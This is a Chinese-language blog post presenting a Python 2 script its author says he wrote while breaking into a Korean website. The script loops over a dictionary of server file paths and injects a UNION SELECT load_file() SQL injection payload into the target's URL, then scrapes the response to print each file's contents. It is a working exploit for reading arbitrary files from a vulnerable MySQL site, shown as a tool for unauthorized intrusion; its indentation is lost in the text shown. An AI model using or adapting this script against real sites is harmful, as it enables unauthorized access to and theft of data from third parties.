Python in Hacking[LOAD_FILE() Helper]

Pnig0s p.s: 渗透一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制

#!/usr/bin/python
# -*- coding:utf-8 -*-
########################################
#          Coder:Pnig0s1992
# A script to auto use the LOAD_FILE()
#      GTalk:pnigos70@gmail.com
#Blog:http://pnig0s1992.blog.51cto.com/
#
########################################
import urllib
import binascii
import string
import os
def guessPath():
fi = open('dic.txt','r+')
while True:
path = fi.readline().strip()
if path:
url = 'http://www.xxx.co.kr/?mode=view&no=\
1151 AnD 1=2 UnIon SeleCt 1,2,3,4,5,load_file(0x'+binascii.b2a_hex(str(path))+')'
EnUrl=urllib.quote_plus(url,safe=':\'/?&=()|')
fd = urllib.urlopen(EnUrl)
res = fd.read()
Begin = res.rfind('<table width="450" border="0" cellspacing="0" cellpadding="0">')
End = res.rfind('<table width="486" border="0" cellspacing="0" cellpadding="0">')
tempDate = res[Begin:End]
realBegin = tempDate.index('<td>')+4
realEnd = tempDate.index('</td>')
checkEmpty = tempDate[realBegin:realEnd].strip()
if checkEmpty:
print path+' is exists!!!!!!!!!!!'
print 'Geting the data......'
print checkEmpty
os.system('pause')
else:
print path+' is not exists.'
continue
else:
print 'All has finished...'
break

if __name__ == '__main__':
print '__________Written by Pnig0s1992__________'
guessPath()

本文出自 “About:Blank H4cking” 博客，请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/473735